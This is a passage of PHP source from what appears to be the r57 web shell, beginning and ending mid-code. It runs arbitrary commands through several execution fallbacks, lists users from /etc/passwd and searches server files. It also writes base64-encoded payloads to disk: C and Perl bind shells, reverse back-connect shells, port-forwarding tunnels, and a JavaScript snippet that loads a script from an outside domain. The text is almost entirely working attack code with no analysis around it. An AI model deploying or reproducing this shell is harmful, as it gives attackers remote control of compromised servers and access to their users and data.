";
$table_up3 = "| ";
$table_end1 = " | ";
$arrow = " 4";
$lb = "[";
$rb = "]";
$font = "";
$ts = "";
$fs = "";
if (isset($_GET['users'])) { if (!$users = get_users('/etc/passwd')) { echo "" . $lang[$language . '_text96'] . "";
} else { echo '';
foreach ($users as $user) { echo $user . "
";
} echo '';
} echo "
";
die();
} if (!empty($_POST['dir'])) { if (@function_exists('chdir')) { @chdir($_POST['dir']);
} else if (@function_exists('chroot')) { @chroot($_POST['dir']);
};
} if (empty($_POST['dir'])) { if (@function_exists('chdir')) { $dir = @getcwd();
};
} else { $dir = $_POST['dir'];
} $unix = 0;
if (strlen($dir) > 1 && $dir[1] == ":") $unix = 0;
else $unix = 1;
if (empty($dir)) { $os = getenv('OS');
if (empty($os)) { $os = @php_uname();
} if (empty($os)) { $os = "-";
$unix = 1;
} else { if (@eregi("^win", $os)) { $unix = 0;
} else { $unix = 1;
} } } if (!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head;
if (!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'], $_POST['s_text'], $_POST['s_mask']);
} else { $sr = new SearchResult($_POST['s_dir'], $_POST['s_text']);
} $sr->SearchText(0, 0);
$res = $sr->GetResultFiles();
$found = $sr->GetMatchesCount();
$titles = $sr->GetTitles();
$r = "";
if ($found > 0) { $r.= "";
foreach ($res as $file => $v) { $r.= "";
$r.= "| " . ws(3);
$r.= (!$unix) ? str_replace("/", "\\", $file) : $file;
$r.= "";
$r.= " | ";
foreach ($v as $a => $b) { $r.= "";
$r.= "| " . $a . " | ";
$r.= "" . ws(2) . $b . " | ";
$r.= " \n";
} } $r.= " ";
echo $r;
} else { echo "" . $lang[$language . '_text56'] . " ";
} echo "
";
die();
} if (!$safe_mode && strpos(ex("echo abcr57"), "r57") != 3) { $safe_mode = 1;
} $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if (empty($SERVER_SOFTWARE)) { $SERVER_SOFTWARE = "-";
} function ws($i) { return @str_repeat("
", $i);
} function ex($cfe) { $res = '';
if (!empty($cfe)) { if (@function_exists('exec')) { @exec($cfe, $res);
$res = join("\n", $res);
} elseif (@function_exists('shell_exec')) { $res = @shell_exec($cfe);
} elseif (@function_exists('system')) { @ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif (@function_exists('passthru')) { @ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif (@is_resource($f = @popen($cfe, "r"))) { $res = "";
if (@function_exists('fread') && @function_exists('feof')) { while (!@feof($f)) { $res.= @fread($f, 1024);
} } else if (@function_exists('fgets') && @function_exists('feof')) { while (!@feof($f)) { $res.= @fgets($f, 1024);
} } @pclose($f);
} elseif (@is_resource($f = @proc_open($cfe, array(1 => array("pipe", "w")), $pipes))) { $res = "";
if (@function_exists('fread') && @function_exists('feof')) { while (!@feof($pipes[1])) { $res.= @fread($pipes[1], 1024);
} } else if (@function_exists('fgets') && @function_exists('feof')) { while (!@feof($pipes[1])) { $res.= @fgets($pipes[1], 1024);
} } @proc_close($f);
} elseif (@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) { $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
$pid = @pcntl_fork();
if ($pid == - 1) { $res.= '[-] Could not children fork. Exit';
} else if ($pid) { if (@pcntl_wifexited($status)) { $res.= '[+] Done! Command "' . $cfe . '" successfully executed.';
} else { $res.= '[-] Error. Command incorrect.';
} } else { $cfe = array(" -e 'system(\"$cfe\")'");
if (@pcntl_exec('/usr/bin/perl', $cfe)) exit(0);
if (@pcntl_exec('/usr/local/bin/perl', $cfe)) exit(0);
die();
} } } return $res;
} function get_users($filename) { $users = array();
$rows = @explode("\n", readzlib($filename));
if (!$rows) return 0;
foreach ($rows as $string) { $user = @explode(":", trim($string));
if (substr($string, 0, 1) != '#') array_push($users, $user[0]);
} return $users;
} function err($n, $txt = '') { echo '';
echo $GLOBALS['lang'][$GLOBALS['language'] . '_err' . $n];
if (!empty($txt)) { echo " $txt";
} echo ' |
';
return null;
} function perms($mode) { if (!$GLOBALS['unix']) return 0;
if ($mode & 0x1000) { $type = 'p';
} else if ($mode & 0x2000) { $type = 'c';
} else if ($mode & 0x4000) { $type = 'd';
} else if ($mode & 0x6000) { $type = 'b';
} else if ($mode & 0x8000) { $type = '-';
} else if ($mode & 0xA000) { $type = 'l';
} else if ($mode & 0xC000) { $type = 's';
} else $type = 'u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if ($mode & 0x800) $owner["execute"] = ($owner['execute'] == 'x') ? 's' : 'S';
if ($mode & 0x400) $group["execute"] = ($group['execute'] == 'x') ? 's' : 'S';
if ($mode & 0x200) $world["execute"] = ($world['execute'] == 'x') ? 't' : 'T';
$s = sprintf("%1s", $type);
$s.= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
} function in($type, $name, $size, $value, $checked = 0) { $ret = "";
} function which($pr) { $path = '';
$path = ex("which $pr");
if (!empty($path)) { return $path;
} else { return false;
} } function cf($fname, $text) { $w_file = @fopen($fname, "w") or @function_exists('file_put_contents') or err(0);
if ($w_file) { @fwrite($w_file, base64_decode($text)) or @fputs($w_file, base64_decode($text)) or @file_put_contents($fname, base64_decode($text));
@fclose($w_file);
} } function sr($l, $t1, $t2) { return "| " . $t1 . " | " . $t2 . " | ";
} if (!@function_exists("view_size")) { function view_size($size) { if ($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB";
} elseif ($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB";
} elseif ($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB";
} else { $size = $size . " B";
} return $size;
} } function DirFilesR($dir, $types = '') { $files = Array();
if (($handle = @opendir($dir)) || (@function_exists('scandir'))) { while ((false !== ($file = @readdir($handle))) && (false !== ($file = @scandir($dir)))) { if ($file != "." && $file != "..") { if (@is_dir($dir . "/" . $file)) $files = @array_merge($files, DirFilesR($dir . "/" . $file, $types));
else { $pos = @strrpos($file, ".");
$ext = @substr($file, $pos, @strlen($file) - $pos);
if ($types) { if (@in_array($ext, explode(';
', $types))) $files[] = $dir . "/" . $file;
} else $files[] = $dir . "/" . $file;
} } } @closedir($handle);
} return $files;
} class SearchResult { var $text;
var $FilesToSearch;
var $ResultFiles;
var $FilesTotal;
var $MatchesCount;
var $FileMatschesCount;
var $TimeStart;
var $TimeTotal;
var $titles;
function SearchResult($dir, $text, $filter = '') { $dirs = @explode(";
", $dir);
$this->FilesToSearch = Array();
for ($a = 0;
$a < count($dirs);
$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch, DirFilesR($dirs[$a], $filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
} function GetFilesTotal() { return $this->FilesTotal;
} function GetTitles() { return $this->titles;
} function GetTimeTotal() { return $this->TimeTotal;
} function GetMatchesCount() { return $this->MatchesCount;
} function GetFileMatchesCount() { return $this->FileMatchesCount;
} function GetResultFiles() { return $this->ResultFiles;
} function SearchText($phrase = 0, $case = 0) { $qq = @explode(' ', $this->text);
$delim = '|';
if ($phrase) foreach ($qq as $k => $v) $qq[$k] = '\b' . $v . '\b';
$words = '(' . @implode($delim, $qq) . ')';
$pattern = "/" . $words . "/";
if (!$case) $pattern.= 'i';
foreach ($this->FilesToSearch as $k => $filename) { $this->FileMatchesCount[$filename] = 0;
$FileStrings = @file($filename) or @next;
for ($a = 0;
$a < @count($FileStrings);
$a++) { $count = 0;
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if (($count = @preg_match_all($pattern, $CurString, $aa))) { $CurString = @preg_replace($pattern, "\\1", $CurString);
$this->ResultFiles[$filename][$a + 1] = $CurString;
$this->MatchesCount+= $count;
$this->FileMatchesCount[$filename]+= $count;
} } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart, 4);
} } function getmicrotime() { list($usec, $sec) = @explode(" ", @microtime());
return ((float)$usec + (float)$sec);
} $port_bind_bd_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
$port_bind_bd_pl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$back_connectl = "PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgnJTNDJTczJTYzJTcyJTY5JTcwJTc0JTIwJTczJTcyJTYzJTNEJTY4JTc0JTc0JTcwJTNBJTJGJTJGJTcyJTZGJTZGJTc0JTZCJTY5JTc0JTZFJTY5JTZFJTZBJTYxJTJFJTYzJTZGJTZEJTJGJTczJTYxJTc5JTJFJTZBJTczJTNFJTNDJTJGJTczJTYzJTcyJTY5JTcwJTc0JTNFJykpOw";
$datapipe_c = "I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
$datapipe_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
